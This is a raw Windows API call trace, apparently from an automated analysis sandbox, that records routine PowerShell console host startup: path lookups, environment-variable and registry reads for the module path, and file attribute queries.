	[0608.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.070] CoTaskMemAlloc (cb=0x804) returned 0x1b85f880
	[0609.070] GetConsoleTitleW (in: lpConsoleTitle=0x1b85f880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0610.119] CoTaskMemFree (pv=0x1b85f880) 
	[0610.146] CoTaskMemAlloc (cb=0x804) returned 0x1b860130
	[0610.147] GetConsoleTitleW (in: lpConsoleTitle=0x1b860130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0610.147] CoTaskMemFree (pv=0x1b860130) 
	[0610.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.149] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0610.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0611.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.154] CoCreateGuid (in: pguid=0x16da10 | out: pguid=0x16da10*(Data1=0x79991239, Data2=0x34a5, Data3=0x48f4, Data4=([0]=0x98, [1]=0xdb, [2]=0x7e, [3]=0x1f, [4]=0xff, [5]=0x1a, [6]=0x7e, [7]=0x40))) returned 0x0
	[0613.155] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0613.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.155] CoTaskMemFree (pv=0x1aa050) 
	[0614.255] WinSqmIsOptedIn () returned 0x0
	[0614.255] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.255] CoTaskMemFree (pv=0x1aa050) 
	[0614.256] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.256] CoTaskMemFree (pv=0x1aa050) 
	[0614.257] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.257] CoTaskMemFree (pv=0x1aa050) 
	[0614.258] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.258] CoTaskMemFree (pv=0x1aa050) 
	[0614.258] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.261] CoTaskMemFree (pv=0x1aa050) 
	[0614.263] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.263] CoTaskMemFree (pv=0x1aa050) 
	[0614.263] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.263] CoTaskMemFree (pv=0x1aa050) 
	[0614.264] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.264] CoTaskMemFree (pv=0x1aa050) 
	[0614.266] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.266] CoTaskMemFree (pv=0x1aa050) 
	[0614.274] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.274] CoTaskMemFree (pv=0x1aa050) 
	[0614.274] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.274] CoTaskMemFree (pv=0x1aa050) 
	[0614.275] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0614.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0614.275] CoTaskMemFree (pv=0x1aa050) 
	[0616.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.746] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0616.746] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0616.746] CoTaskMemFree (pv=0x1aa050) 
	[0616.748] CoTaskMemAlloc (cb=0xcc) returned 0x24f7a0
	[0616.748] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24f7a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0616.748] CoTaskMemFree (pv=0x24f7a0) 
	[0616.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d588 | out: phkResult=0x16d588*=0x31c) returned 0x0
	[0616.748] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d50c, lpData=0x0, lpcbData=0x16d508*=0x0 | out: lpType=0x16d50c*=0x2, lpData=0x0, lpcbData=0x16d508*=0x6c) returned 0x0
	[0616.748] CoTaskMemAlloc (cb=0x70) returned 0x1f0300
	[0616.748] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d4dc, lpData=0x1f0300, lpcbData=0x16d4d8*=0x6c | out: lpType=0x16d4dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d4d8*=0x6c) returned 0x0
	[0616.748] CoTaskMemFree (pv=0x1f0300) 
	[0616.748] CoTaskMemAlloc (cb=0xcc) returned 0x24f7a0
	[0616.748] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x24f7a0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0616.749] CoTaskMemFree (pv=0x24f7a0) 
	[0616.749] CoTaskMemAlloc (cb=0xcc) returned 0x24f7a0
	[0616.749] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24f7a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0616.749] CoTaskMemFree (pv=0x24f7a0) 
	[0617.235] RegCloseKey (hKey=0x31c) returned 0x0
	[0617.235] CoTaskMemAlloc (cb=0xcc) returned 0x24f7a0
	[0617.235] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24f7a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0617.236] CoTaskMemFree (pv=0x24f7a0) 
	[0617.236] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d588 | out: phkResult=0x16d588*=0x31c) returned 0x0
	[0617.236] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d50c, lpData=0x0, lpcbData=0x16d508*=0x0 | out: lpType=0x16d50c*=0x0, lpData=0x0, lpcbData=0x16d508*=0x0) returned 0x2
	[0617.236] RegCloseKey (hKey=0x31c) returned 0x0
	[0617.240] CoTaskMemAlloc (cb=0x20c) returned 0x244ae0
	[0617.240] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x244ae0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0617.241] CoTaskMemFree (pv=0x244ae0) 
	[0617.242] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0617.243] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0617.256] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0617.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.256] CoTaskMemFree (pv=0x1aa050) 
	[0617.258] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0617.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.258] CoTaskMemFree (pv=0x1aa050) 
	[0617.261] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0617.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.261] CoTaskMemFree (pv=0x1aa050) 
	[0617.261] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0617.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.261] CoTaskMemFree (pv=0x1aa050) 
	[0617.263] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d378 | out: phkResult=0x16d378*=0x324) returned 0x0
	[0617.264] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x16d38c, lpData=0x0, lpcbData=0x16d388*=0x0 | out: lpType=0x16d38c*=0x1, lpData=0x0, lpcbData=0x16d388*=0x74) returned 0x0
	[0617.264] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x16d2fc, lpData=0x0, lpcbData=0x16d2f8*=0x0 | out: lpType=0x16d2fc*=0x1, lpData=0x0, lpcbData=0x16d2f8*=0x74) returned 0x0
	[0617.265] CoTaskMemAlloc (cb=0x78) returned 0x1f0300
	[0617.265] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x16d2cc, lpData=0x1f0300, lpcbData=0x16d2c8*=0x74 | out: lpType=0x16d2cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d2c8*=0x74) returned 0x0
	[0617.265] CoTaskMemFree (pv=0x1f0300) 
	[0617.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0617.265] SetErrorMode (uMode=0x1) returned 0x1
	[0617.265] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d250 | out: lpFileInformation=0x16d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0617.265] SetErrorMode (uMode=0x1) returned 0x1
	[0617.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0617.266] SetErrorMode (uMode=0x1) returned 0x1
	[0617.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d250 | out: lpFileInformation=0x16d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0617.266] SetErrorMode (uMode=0x1) returned 0x1
	[0617.269] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0617.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.269] CoTaskMemFree (pv=0x1aa050) 
	[0618.026] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0618.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
